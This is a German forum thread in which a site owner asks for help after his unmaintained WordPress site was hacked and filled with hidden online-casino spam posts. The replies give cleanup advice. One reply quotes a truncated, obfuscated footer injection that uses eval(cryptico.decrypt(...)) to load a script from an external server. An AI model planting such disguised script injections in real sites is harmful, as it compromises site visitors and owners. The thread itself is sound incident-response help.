Ungewünschte Werbung auf Webseite

  • Liebe Community,

    ich habe vor vielen Jahren mal eine Seite gebaut, die dann ohne Pflege und Updates vor sich hingedümpelt ist. Jetzt kam alles so, wie es kommen musste, irgendein Dritter hat Zugriff erhalten.

    Konkret geht es z.B. um diesen Link https://www.mediaplan-gruppe.de/2021/03/02/onl…t-5-einzahlung/

    Wordpress hatte einige ungewünschte Benutzer, die ich bereits entfernt habe. Alle Benutzerpasswörter und FTP-Daten sind geändert. Wordpress + Plugins sind aktualisiert. Aber wie komme ich an diesen Link? Weder unter Posts oder Seiten konnte ich etwas finden.

    Hat jemand eine Idee?

    Vielen Dank und Gruß
    Mats

    UPDATE:
    Bei der Suche nach "online-casino" per phpMyAdmin finde ich einen ganzen Schwung (1789 Stück) unerwünschter Beiträge in der Tabelle "wp_posts"... Warum sind die denn im Backend nicht sichtbar?

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren


  • Bei der Suche nach "online-casino" per phpMyAdmin finde ich einen ganzen Schwung (1789 Stück) unerwünschter Beiträge in der Tabelle "wp_posts"... Warum sind die denn im Backend nicht sichtbar?

    Warum sollte der Angreifer dafür sorgen, dass du diese im Admin sehen kannst? Es reicht doch aus, wenn deine Online Reputation vernichtet wird.

    Nach einem erfolgreichen Hackerangriff kannst du eigentlich keiner Datei und keinem Datensatz mehr trauen. Eine saubere Datensicherung hast du nicht zufällig mehr?

    Besorge zu deiner WordPress Version die Original Dateien
    https://wordpress.org/download/releases/

    - diese enthalten schon mal keinen Schadcode (angeblich)
    - dies machst du auch mit den Themes und Plugins.
    - und mit phpMyAdmin löscht du evtl. die "online-casino" einträge.

    Mit offenen Augen träumen

  • Vielen Dank,

    doch, ein Backup habe ich in der Tat. Dort müsste nur redaktionell ein bißchen etwas aufgearbeitet werden.

    Danke für die Hilfe.

  • Kurzer Blick in Quelltext der Seite zeigt im Footerbereich derzeit folgenden Code:

    Code
    <script src="https://cdnjs.cloudflare.com/ajax/libs/cryptico/0.0.1343522940/cryptico.js" type="text/javascript"></script>
    
    
    <script type="text/javascript">eval(cryptico.decrypt('Vv+Gp86GgSjDLvYTR7/whX+iLJ1Ae8fPYqUB7...


    Das fügt nach dem "Entschlüsseln" ein weiteres Script von einem externen Server whoisvisiting[dot]com in die Seite ein, das (ohne weitere Analyse) erstmal nach einem Tracker o.ä. aussieht. Aufgrund der Tatsache, dass es so "pseudoversteckt" eingefügt wird und in der Datenschutzerklärung aktuell nicht vorkommt, sollte man noch hinterfragen, wo das herkommt und ob es legitim ist.

    Ergänzung: Generell wäre der wichtigste Teil von solchen Aufräumarbeiten das Analysieren und klare Nachvollziehen, wie der Website gehackt wurde, sonst wird das vermutlich zeitnah wieder passieren, wenn z.B. die gleiche Lücke oder auch schon ein bestehender Trojaner mit einem Backup wieder eingespielt wird...

    7 Mal editiert, zuletzt von b3317133 (5. Mai 2021 um 10:17)

  • Das war vielleicht etwas voreilig, denn erste Ratschläge liegen hier doch bereits vor.

  • Dann könnte Deine nächste Frage lauten: "Wie stelle ich meine Site wieder her??" o_O

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!